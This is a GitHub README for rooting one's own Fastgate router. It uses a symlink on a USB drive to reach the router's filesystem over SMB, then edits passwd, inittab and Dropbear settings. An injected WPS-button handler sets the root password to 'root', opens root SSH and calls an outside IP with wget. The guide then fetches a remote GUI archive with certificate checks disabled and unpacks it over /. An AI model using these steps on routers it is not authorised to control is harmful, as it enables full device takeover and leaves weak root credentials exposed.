Skip to content

classy-giraffe/FastgateRoot

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
_config.yml
_config.yml
 
 

Repository files navigation

Fastgate Rooting

How to get full access to your Fastgate, a widely used Router distributed by the ISP Fastweb in Italy.

How does it work?

This trick uses a very old flaw available in a good majority of Technicolor routers. As explained later, you can can trick the router into displaying the content of its root folder of the router by crafting a special symbolic link, putting it on a USB drive and navigating the FS with SMB.

Getting Started

Requirements

  • A FASTGate DGA4131 (VBNT-O).
  • An USB Drive.
  • A Linux machine (a live version of Ubuntu should be ok, probably WSL too).

Instructions

  • Open up a terminal, navigate to the USB Drive path and type the following: ln -s / rootlink.
  • Open up a browser, login to the FastFate admin page (it's usually available here).
  • Once you logged on, click here.
  • Plug the USB Drive into your router.
  • Navigate to \\192.168.1.254\usbdisk\rootlink by using a SMB Client.
  • Now you should be able to access the root folder of the router.
  • Edit /etc/inittab by removing '#' from the last line ::askconsole:/bin/login, if there is none just leave it as it is. This should turn the console login on, in case you screw up.
  • Edit /etc/passwd by removing root:/bin/false and adding root:/bin/ash. This allows using a shell for an eventual login.
  • Edit /etc/config/dropbear as following (delete every other config involving SSH in this file, if there is any):
 config dropbear 'Example'
  option Interface 'lan'
  option Port '22'
  option IdleTimeout '600'
  option PasswordAuth 'on'
  option RootPasswordAuth 'on'
  option RootLogin '1'
  option enable '1'
  • Edit /etc/config/button by editing option handler 'wps_button_pressed_ssh.sh' as always, leaving everything else by default:
config button 'wps'
...
option handler 'sed -i '\''s#/root:.*$#/root:/bin/ash#'\'' /etc/passwd && echo root:root | chpasswd && sed -i '\''s/#//'\'' /etc/inittab && (uci -q delete dropbear.afg || true) && uci add dropbear dropbear && uci rename dropbear.@dropbear[-1]=afg && uci set dropbear.afg.enable='\''1'\'' && uci set dropbear.afg.Interface='\''lan'\'' && uci set dropbear.afg.Port='\''22'\'' && uci set dropbear.afg.IdleTimeout='\''600'\'' && uci set dropbear.afg.PasswordAuth='\''on'\'' && uci set dropbear.afg.RootPasswordAuth='\''on'\'' && uci set dropbear.afg.RootLogin='\''1'\'' && uci commit dropbear && /etc/init.d/dropbear enable && /etc/init.d/dropbear restart && uci set button.wps.handler='\''wps_button_pressed.sh'\'' && uci commit && wget http://58.162.0.1/done || true'
  • Now press thee WPS Button on the router, this should trigger a Dropbear SSH server on port 22.
  • You can login into your router via SSH, using root both as username and password.
  • You can now proceed to install Ansuel GUI (a custom GUI):
curl -k https://raw.githubusercontent.com/Ansuel/gui-dev-build-auto/master/GUI.tar.bz2 --output /tmp/GUI.tar.bz2
bzcat /tmp/GUI.tar.bz2 | tar -C / -xvf -
/etc/init.d/rootdevice force
  • Enjoy your brand new router!

About

How to get full access to a Fastgate router.

classy-giraffe.github.io/FastgateRoot

Topics

router exploit openwrt root italy fastgate

Resources

Readme

License

MIT license
Activity

Stars

4 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published